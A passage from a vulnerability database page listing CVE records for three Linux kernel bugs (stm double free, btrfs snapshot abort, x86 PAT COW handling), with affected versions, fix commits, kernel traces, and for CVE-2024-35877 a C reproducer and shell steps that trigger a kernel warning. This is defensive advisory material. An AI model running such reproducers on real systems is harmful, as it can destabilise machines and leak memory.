"assignerShortName": "Linux",
"cveId": "CVE-2024-35811",
"datePublished": "2024-05-17T13:23:17.508Z",
"dateReserved": "2024-05-17T12:19:12.342Z",
"dateUpdated": "2025-05-04T09:05:55.989Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38627 (GCVE-0-2024-38627)
Vulnerability from cvelistv5
Published
2024-06-21 10:18
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
stm class: Fix a double free in stm_register_device()
The put_device(&stm->dev) call will trigger stm_device_release() which
frees "stm" so the vfree(stm) on the next line is a double free.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 389b6699a2aa0b457aa69986e9ddf39f3b4030fd Version: 389b6699a2aa0b457aa69986e9ddf39f3b4030fd Version: 389b6699a2aa0b457aa69986e9ddf39f3b4030fd Version: 389b6699a2aa0b457aa69986e9ddf39f3b4030fd Version: 389b6699a2aa0b457aa69986e9ddf39f3b4030fd Version: 389b6699a2aa0b457aa69986e9ddf39f3b4030fd Version: 389b6699a2aa0b457aa69986e9ddf39f3b4030fd Version: 389b6699a2aa0b457aa69986e9ddf39f3b4030fd Version: b0351a51ffda593b2b1b35dd0c00a73505edb256 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-38627",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-21T13:23:15.087129Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-21T13:23:21.516Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:50.394Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6cc30ef8eb6d8f8d6df43152264bbf8835d99931"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a0450d3f38e7c6c0a7c0afd4182976ee15573695"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/713fc00c571dde4af3db2dbd5d1b0eadc327817b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7419df1acffbcc90037f6b5a2823e81389659b36"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4bfd48bb6e62512b9c392c5002c11e1e3b18d247"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/370c480410f60b90ba3e96abe73ead21ec827b20"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d782a2db8f7ac49c33b9ca3e835500a28667d1be"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3df463865ba42b8f88a590326f4c9ea17a1ce459"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/hwtracing/stm/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "6cc30ef8eb6d8f8d6df43152264bbf8835d99931",
"status": "affected",
"version": "389b6699a2aa0b457aa69986e9ddf39f3b4030fd",
"versionType": "git"
},
{
"lessThan": "a0450d3f38e7c6c0a7c0afd4182976ee15573695",
"status": "affected",
"version": "389b6699a2aa0b457aa69986e9ddf39f3b4030fd",
"versionType": "git"
},
{
"lessThan": "713fc00c571dde4af3db2dbd5d1b0eadc327817b",
"status": "affected",
"version": "389b6699a2aa0b457aa69986e9ddf39f3b4030fd",
"versionType": "git"
},
{
"lessThan": "7419df1acffbcc90037f6b5a2823e81389659b36",
"status": "affected",
"version": "389b6699a2aa0b457aa69986e9ddf39f3b4030fd",
"versionType": "git"
},
{
"lessThan": "4bfd48bb6e62512b9c392c5002c11e1e3b18d247",
"status": "affected",
"version": "389b6699a2aa0b457aa69986e9ddf39f3b4030fd",
"versionType": "git"
},
{
"lessThan": "370c480410f60b90ba3e96abe73ead21ec827b20",
"status": "affected",
"version": "389b6699a2aa0b457aa69986e9ddf39f3b4030fd",
"versionType": "git"
},
{
"lessThan": "d782a2db8f7ac49c33b9ca3e835500a28667d1be",
"status": "affected",
"version": "389b6699a2aa0b457aa69986e9ddf39f3b4030fd",
"versionType": "git"
},
{
"lessThan": "3df463865ba42b8f88a590326f4c9ea17a1ce459",
"status": "affected",
"version": "389b6699a2aa0b457aa69986e9ddf39f3b4030fd",
"versionType": "git"
},
{
"status": "affected",
"version": "b0351a51ffda593b2b1b35dd0c00a73505edb256",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/hwtracing/stm/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.7"
},
{
"lessThan": "4.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.4",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.4.178",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nstm class: Fix a double free in stm_register_device()\n\nThe put_device(\u0026stm-\u003edev) call will trigger stm_device_release() which\nfrees \"stm\" so the vfree(stm) on the next line is a double free."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:56:54.142Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/6cc30ef8eb6d8f8d6df43152264bbf8835d99931"
},
{
"url": "https://git.kernel.org/stable/c/a0450d3f38e7c6c0a7c0afd4182976ee15573695"
},
{
"url": "https://git.kernel.org/stable/c/713fc00c571dde4af3db2dbd5d1b0eadc327817b"
},
{
"url": "https://git.kernel.org/stable/c/7419df1acffbcc90037f6b5a2823e81389659b36"
},
{
"url": "https://git.kernel.org/stable/c/4bfd48bb6e62512b9c392c5002c11e1e3b18d247"
},
{
"url": "https://git.kernel.org/stable/c/370c480410f60b90ba3e96abe73ead21ec827b20"
},
{
"url": "https://git.kernel.org/stable/c/d782a2db8f7ac49c33b9ca3e835500a28667d1be"
},
{
"url": "https://git.kernel.org/stable/c/3df463865ba42b8f88a590326f4c9ea17a1ce459"
}
],
"title": "stm class: Fix a double free in stm_register_device()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38627",
"datePublished": "2024-06-21T10:18:18.912Z",
"dateReserved": "2024-06-18T19:36:34.946Z",
"dateUpdated": "2025-11-04T17:21:50.394Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26644 (GCVE-0-2024-26644)
Vulnerability from cvelistv5
Published
2024-03-26 15:17
Modified
2025-07-17 16:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
btrfs: don't abort filesystem when attempting to snapshot deleted subvolume
If the source file descriptor to the snapshot ioctl refers to a deleted
subvolume, we get the following abort:
BTRFS: Transaction aborted (error -2)
WARNING: CPU: 0 PID: 833 at fs/btrfs/transaction.c:1875 create_pending_snapshot+0x1040/0x1190 [btrfs]
Modules linked in: pata_acpi btrfs ata_piix libata scsi_mod virtio_net blake2b_generic xor net_failover virtio_rng failover scsi_common rng_core raid6_pq libcrc32c
CPU: 0 PID: 833 Comm: t_snapshot_dele Not tainted 6.7.0-rc6 #2
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-1.fc39 04/01/2014
RIP: 0010:create_pending_snapshot+0x1040/0x1190 [btrfs]
RSP: 0018:ffffa09c01337af8 EFLAGS: 00010282
RAX: 0000000000000000 RBX: ffff9982053e7c78 RCX: 0000000000000027
RDX: ffff99827dc20848 RSI: 0000000000000001 RDI: ffff99827dc20840
RBP: ffffa09c01337c00 R08: 0000000000000000 R09: ffffa09c01337998
R10: 0000000000000003 R11: ffffffffb96da248 R12: fffffffffffffffe
R13: ffff99820535bb28 R14: ffff99820b7bd000 R15: ffff99820381ea80
FS: 00007fe20aadabc0(0000) GS:ffff99827dc00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000559a120b502f CR3: 00000000055b6000 CR4: 00000000000006f0
Call Trace:
<TASK>
? create_pending_snapshot+0x1040/0x1190 [btrfs]
? __warn+0x81/0x130
? create_pending_snapshot+0x1040/0x1190 [btrfs]
? report_bug+0x171/0x1a0
? handle_bug+0x3a/0x70
? exc_invalid_op+0x17/0x70
? asm_exc_invalid_op+0x1a/0x20
? create_pending_snapshot+0x1040/0x1190 [btrfs]
? create_pending_snapshot+0x1040/0x1190 [btrfs]
create_pending_snapshots+0x92/0xc0 [btrfs]
btrfs_commit_transaction+0x66b/0xf40 [btrfs]
btrfs_mksubvol+0x301/0x4d0 [btrfs]
btrfs_mksnapshot+0x80/0xb0 [btrfs]
__btrfs_ioctl_snap_create+0x1c2/0x1d0 [btrfs]
btrfs_ioctl_snap_create_v2+0xc4/0x150 [btrfs]
btrfs_ioctl+0x8a6/0x2650 [btrfs]
? kmem_cache_free+0x22/0x340
? do_sys_openat2+0x97/0xe0
__x64_sys_ioctl+0x97/0xd0
do_syscall_64+0x46/0xf0
entry_SYSCALL_64_after_hwframe+0x6e/0x76
RIP: 0033:0x7fe20abe83af
RSP: 002b:00007ffe6eff1360 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
RAX: ffffffffffffffda RBX: 0000000000000004 RCX: 00007fe20abe83af
RDX: 00007ffe6eff23c0 RSI: 0000000050009417 RDI: 0000000000000003
RBP: 0000000000000003 R08: 0000000000000000 R09: 00007fe20ad16cd0
R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
R13: 00007ffe6eff13c0 R14: 00007fe20ad45000 R15: 0000559a120b6d58
</TASK>
---[ end trace 0000000000000000 ]---
BTRFS: error (device vdc: state A) in create_pending_snapshot:1875: errno=-2 No such entry
BTRFS info (device vdc: state EA): forced readonly
BTRFS warning (device vdc: state EA): Skipping commit of aborted transaction.
BTRFS: error (device vdc: state EA) in cleanup_transaction:2055: errno=-2 No such entry
This happens because create_pending_snapshot() initializes the new root
item as a copy of the source root item. This includes the refs field,
which is 0 for a deleted subvolume. The call to btrfs_insert_root()
therefore inserts a root with refs == 0. btrfs_get_new_fs_root() then
finds the root and returns -ENOENT if refs == 0, which causes
create_pending_snapshot() to abort.
Fix it by checking the source root's refs before attempting the
snapshot, but after locking subvol_sem to avoid racing with deletion.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26644",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-21T16:07:39.514220Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-21T16:07:49.207Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:07:19.716Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2bdf872bcfe629a6202ffd6641615a8ed00e8464"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0877497dc97834728e1b528ddf1e1c484292c29c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6e6bca99e8d88d989a7cde4c064abea552d5219b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ec794a7528199e1be6d47bec03f4755aa75df256"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d8680b722f0ff6d7a01ddacc1844e0d52354d6ff"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7081929ab2572920e94d70be3d332e5c9f97095a"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/btrfs/ioctl.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c06941564027bdbc01d2df7f41e333c11cb0482d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "2bdf872bcfe629a6202ffd6641615a8ed00e8464",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "0877497dc97834728e1b528ddf1e1c484292c29c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6e6bca99e8d88d989a7cde4c064abea552d5219b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ec794a7528199e1be6d47bec03f4755aa75df256",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d8680b722f0ff6d7a01ddacc1844e0d52354d6ff",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7081929ab2572920e94d70be3d332e5c9f97095a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/btrfs/ioctl.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.296",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.296",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: don\u0027t abort filesystem when attempting to snapshot deleted subvolume\n\nIf the source file descriptor to the snapshot ioctl refers to a deleted\nsubvolume, we get the following abort:\n\n BTRFS: Transaction aborted (error -2)\n WARNING: CPU: 0 PID: 833 at fs/btrfs/transaction.c:1875 create_pending_snapshot+0x1040/0x1190 [btrfs]\n Modules linked in: pata_acpi btrfs ata_piix libata scsi_mod virtio_net blake2b_generic xor net_failover virtio_rng failover scsi_common rng_core raid6_pq libcrc32c\n CPU: 0 PID: 833 Comm: t_snapshot_dele Not tainted 6.7.0-rc6 #2\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-1.fc39 04/01/2014\n RIP: 0010:create_pending_snapshot+0x1040/0x1190 [btrfs]\n RSP: 0018:ffffa09c01337af8 EFLAGS: 00010282\n RAX: 0000000000000000 RBX: ffff9982053e7c78 RCX: 0000000000000027\n RDX: ffff99827dc20848 RSI: 0000000000000001 RDI: ffff99827dc20840\n RBP: ffffa09c01337c00 R08: 0000000000000000 R09: ffffa09c01337998\n R10: 0000000000000003 R11: ffffffffb96da248 R12: fffffffffffffffe\n R13: ffff99820535bb28 R14: ffff99820b7bd000 R15: ffff99820381ea80\n FS: 00007fe20aadabc0(0000) GS:ffff99827dc00000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000559a120b502f CR3: 00000000055b6000 CR4: 00000000000006f0\n Call Trace:\n \u003cTASK\u003e\n ? create_pending_snapshot+0x1040/0x1190 [btrfs]\n ? __warn+0x81/0x130\n ? create_pending_snapshot+0x1040/0x1190 [btrfs]\n ? report_bug+0x171/0x1a0\n ? handle_bug+0x3a/0x70\n ? exc_invalid_op+0x17/0x70\n ? asm_exc_invalid_op+0x1a/0x20\n ? create_pending_snapshot+0x1040/0x1190 [btrfs]\n ? create_pending_snapshot+0x1040/0x1190 [btrfs]\n create_pending_snapshots+0x92/0xc0 [btrfs]\n btrfs_commit_transaction+0x66b/0xf40 [btrfs]\n btrfs_mksubvol+0x301/0x4d0 [btrfs]\n btrfs_mksnapshot+0x80/0xb0 [btrfs]\n __btrfs_ioctl_snap_create+0x1c2/0x1d0 [btrfs]\n btrfs_ioctl_snap_create_v2+0xc4/0x150 [btrfs]\n btrfs_ioctl+0x8a6/0x2650 [btrfs]\n ? kmem_cache_free+0x22/0x340\n ? do_sys_openat2+0x97/0xe0\n __x64_sys_ioctl+0x97/0xd0\n do_syscall_64+0x46/0xf0\n entry_SYSCALL_64_after_hwframe+0x6e/0x76\n RIP: 0033:0x7fe20abe83af\n RSP: 002b:00007ffe6eff1360 EFLAGS: 00000246 ORIG_RAX: 0000000000000010\n RAX: ffffffffffffffda RBX: 0000000000000004 RCX: 00007fe20abe83af\n RDX: 00007ffe6eff23c0 RSI: 0000000050009417 RDI: 0000000000000003\n RBP: 0000000000000003 R08: 0000000000000000 R09: 00007fe20ad16cd0\n R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000\n R13: 00007ffe6eff13c0 R14: 00007fe20ad45000 R15: 0000559a120b6d58\n \u003c/TASK\u003e\n ---[ end trace 0000000000000000 ]---\n BTRFS: error (device vdc: state A) in create_pending_snapshot:1875: errno=-2 No such entry\n BTRFS info (device vdc: state EA): forced readonly\n BTRFS warning (device vdc: state EA): Skipping commit of aborted transaction.\n BTRFS: error (device vdc: state EA) in cleanup_transaction:2055: errno=-2 No such entry\n\nThis happens because create_pending_snapshot() initializes the new root\nitem as a copy of the source root item. This includes the refs field,\nwhich is 0 for a deleted subvolume. The call to btrfs_insert_root()\ntherefore inserts a root with refs == 0. btrfs_get_new_fs_root() then\nfinds the root and returns -ENOENT if refs == 0, which causes\ncreate_pending_snapshot() to abort.\n\nFix it by checking the source root\u0027s refs before attempting the\nsnapshot, but after locking subvol_sem to avoid racing with deletion."
}
],
"providerMetadata": {
"dateUpdated": "2025-07-17T16:55:27.249Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c06941564027bdbc01d2df7f41e333c11cb0482d"
},
{
"url": "https://git.kernel.org/stable/c/2bdf872bcfe629a6202ffd6641615a8ed00e8464"
},
{
"url": "https://git.kernel.org/stable/c/0877497dc97834728e1b528ddf1e1c484292c29c"
},
{
"url": "https://git.kernel.org/stable/c/6e6bca99e8d88d989a7cde4c064abea552d5219b"
},
{
"url": "https://git.kernel.org/stable/c/ec794a7528199e1be6d47bec03f4755aa75df256"
},
{
"url": "https://git.kernel.org/stable/c/d8680b722f0ff6d7a01ddacc1844e0d52354d6ff"
},
{
"url": "https://git.kernel.org/stable/c/7081929ab2572920e94d70be3d332e5c9f97095a"
}
],
"title": "btrfs: don\u0027t abort filesystem when attempting to snapshot deleted subvolume",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26644",
"datePublished": "2024-03-26T15:17:17.614Z",
"dateReserved": "2024-02-19T14:20:24.138Z",
"dateUpdated": "2025-07-17T16:55:27.249Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35877 (GCVE-0-2024-35877)
Vulnerability from cvelistv5
Published
2024-05-19 08:34
Modified
2025-05-04 09:07
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
x86/mm/pat: fix VM_PAT handling in COW mappings
PAT handling won't do the right thing in COW mappings: the first PTE (or,
in fact, all PTEs) can be replaced during write faults to point at anon
folios. Reliably recovering the correct PFN and cachemode using
follow_phys() from PTEs will not work in COW mappings.
Using follow_phys(), we might just get the address+protection of the anon
folio (which is very wrong), or fail on swap/nonswap entries, failing
follow_phys() and triggering a WARN_ON_ONCE() in untrack_pfn() and
track_pfn_copy(), not properly calling free_pfn_range().
In free_pfn_range(), we either wouldn't call memtype_free() or would call
it with the wrong range, possibly leaking memory.
To fix that, let's update follow_phys() to refuse returning anon folios,
and fallback to using the stored PFN inside vma->vm_pgoff for COW mappings
if we run into that.
We will now properly handle untrack_pfn() with COW mappings, where we
don't need the cachemode. We'll have to fail fork()->track_pfn_copy() if
the first page was replaced by an anon folio, though: we'd have to store
the cachemode in the VMA to make this work, likely growing the VMA size.
For now, lets keep it simple and let track_pfn_copy() just fail in that
case: it would have failed in the past with swap/nonswap entries already,
and it would have done the wrong thing with anon folios.
Simple reproducer to trigger the WARN_ON_ONCE() in untrack_pfn():
<--- C reproducer --->
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>
#include <liburing.h>
int main(void)
{
struct io_uring_params p = {};
int ring_fd;
size_t size;
char *map;
ring_fd = io_uring_setup(1, &p);
if (ring_fd < 0) {
perror("io_uring_setup");
return 1;
}
size = p.sq_off.array + p.sq_entries * sizeof(unsigned);
/* Map the submission queue ring MAP_PRIVATE */
map = mmap(0, size, PROT_READ | PROT_WRITE, MAP_PRIVATE,
ring_fd, IORING_OFF_SQ_RING);
if (map == MAP_FAILED) {
perror("mmap");
return 1;
}
/* We have at least one page. Let's COW it. */
*map = 0;
pause();
return 0;
}
<--- C reproducer --->
On a system with 16 GiB RAM and swap configured:
# ./iouring &
# memhog 16G
# killall iouring
[ 301.552930] ------------[ cut here ]------------
[ 301.553285] WARNING: CPU: 7 PID: 1402 at arch/x86/mm/pat/memtype.c:1060 untrack_pfn+0xf4/0x100
[ 301.553989] Modules linked in: binfmt_misc nft_fib_inet nft_fib_ipv4 nft_fib_ipv6 nft_fib nft_reject_g
[ 301.558232] CPU: 7 PID: 1402 Comm: iouring Not tainted 6.7.5-100.fc38.x86_64 #1
[ 301.558772] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebu4
[ 301.559569] RIP: 0010:untrack_pfn+0xf4/0x100
[ 301.559893] Code: 75 c4 eb cf 48 8b 43 10 8b a8 e8 00 00 00 3b 6b 28 74 b8 48 8b 7b 30 e8 ea 1a f7 000
[ 301.561189] RSP: 0018:ffffba2c0377fab8 EFLAGS: 00010282
[ 301.561590] RAX: 00000000ffffffea RBX: ffff9208c8ce9cc0 RCX: 000000010455e047
[ 301.562105] RDX: 07fffffff0eb1e0a RSI: 0000000000000000 RDI: ffff9208c391d200
[ 301.562628] RBP: 0000000000000000 R08: ffffba2c0377fab8 R09: 0000000000000000
[ 301.563145] R10: ffff9208d2292d50 R11: 0000000000000002 R12: 00007fea890e0000
[ 301.563669] R13: 0000000000000000 R14: ffffba2c0377fc08 R15: 0000000000000000
[ 301.564186] FS: 0000000000000000(0000) GS:ffff920c2fbc0000(0000) knlGS:0000000000000000
[ 301.564773] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 301.565197] CR2: 00007fea88ee8a20 CR3: 00000001033a8000 CR4: 0000000000750ef0
[ 301.565725] PKRU: 55555554
[ 301.565944] Call Trace:
[ 301.566148] <TASK>
[ 301.566325] ? untrack_pfn+0xf4/0x100
[ 301.566618] ? __warn+0x81/0x130
[ 301.566876] ? untrack_pfn+0xf4/0x100
[ 3
---truncated---
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
